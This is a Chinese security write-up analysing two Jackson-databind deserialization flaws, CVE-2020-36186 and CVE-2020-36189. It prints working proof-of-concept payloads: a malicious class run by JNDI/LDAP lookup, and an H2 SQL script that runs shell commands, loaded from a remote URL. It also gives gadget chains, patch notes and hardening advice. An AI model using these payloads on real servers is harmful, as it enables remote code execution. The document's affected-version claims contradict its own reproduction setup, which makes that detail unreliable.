Jackson-databind漏洞两则分析
字数 1709 2025-08-06 08:35:44
Jackson-databind漏洞分析与利用指南
漏洞概述
本文档详细分析Jackson-databind的两个高危漏洞:CVE-2020-36189(SSRF&RCE)和CVE-2020-36186(RCE),并提供利用方法和防护建议。
CVE-2020-36186漏洞分析
影响范围
- Jackson-databind版本 < 2.9.10.7
利用条件
- 开启了
enableDefaultTyping() - 使用了
commons-dbcp第三方依赖库
漏洞描述
org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource类绕过了Jackson-databind维护的黑名单类,在JDK版本较低的情况下可造成远程代码执行(RCE)。
漏洞复现环境配置
pom.xml依赖配置:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<dependency>
<groupId>tomcat</groupId>
<artifactId>naming-factory-dbcp</artifactId>
<version>5.5.23</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
利用步骤
- 准备恶意类 - Exploit.java:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- 搭建HTTP服务:
python -m SimpleHTTPServer 4444
-
搭建LDAP服务:
使用marshalsec工具启动LDAP服务 -
执行漏洞POC - POC.java:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource\", {\"dataSourceName\":\"ldap://127.0.0.1:1288/Exploit\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
漏洞原理分析
攻击链(Gadget Chain):
PerUserPoolDataSource
-> InstanceKeyDataSource.setDataSourceName
-> PerUserPoolDataSource.getPooledConnectionAndInfo
-> PerUserPoolDataSource.registerPool
-> PerUserPoolDataSource.testCPDS
-> lookup
补丁分析
官方将org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource加入黑名单中。同时需要注意另一个类似类org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource也存在类似风险。
CVE-2020-36189漏洞分析
影响范围
- Jackson-databind版本 < 2.9.10.7
利用条件
- 开启了
enableDefaultTyping() - 使用了
com.h2database或com.newrelic.agent.java第三方依赖库
漏洞描述
com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类绕过了Jackson-databind的黑名单,可导致SSRF和RCE。
漏洞复现环境配置
pom.xml依赖配置:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<dependency>
<groupId>com.newrelic.agent.java</groupId>
<artifactId>newrelic-agent</artifactId>
<version>4.9.0</version>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
利用步骤
- 准备SQL脚本 - exec.sql:
CREATE ALIAS SHELLEXEC AS
$$
String shellexec(String cmd) throws java.io.IOException {
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$
;
CALL SHELLEXEC('calc.exe')
- 搭建HTTP服务:
python2 -m simpleHTTPServer 4444
- SSRF利用POC:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://6vrdsp.dnslog.cn/exec.sql'\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
- RCE利用POC:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:4444/exec.sql'\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
漏洞原理分析
攻击链(Gadget Chain):
DriverManagerConnectionSource
-> seturl
-> getConnection
-> DirverManager.getConnection(this.url)
补丁分析
官方将com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource加入黑名单。
新型Gadget披露
Gadget 1
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC2 {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariDataSource\", {\"metricRegistry\": \"ldap://127.0.0.1:1288/Exploit\"}]";
mapper.readValue(json, Object.class);
}
}
Gadget 2
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC2 {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\": \"ldap://127.0.0.1:1288/Exploit\"}]";
mapper.readValue(json, Object.class);
}
}
官方政策变更
自2020年12月31日发布2.9.10.8版本后,Jackson-databind将:
- 不再维护黑名单(除非有极其严重的问题)
- 不再为相关漏洞申请CVE编号
- 继续接受安全报告
防护建议
- 升级Jackson-databind至安全版本(>=2.9.10.7)
- 升级JDK至高版本(>=JDK 11.0.1、8u191、7u201、6u211)
- 避免使用
enableDefaultTyping()方法 - 审查依赖中是否包含危险组件(如commons-dbcp、h2database等)
参考链接
- https://github.com/FasterXML/jackson-databind/issues/2997
- https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1
- https://github.com/FasterXML/jackson-databind/issues/2996
- https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4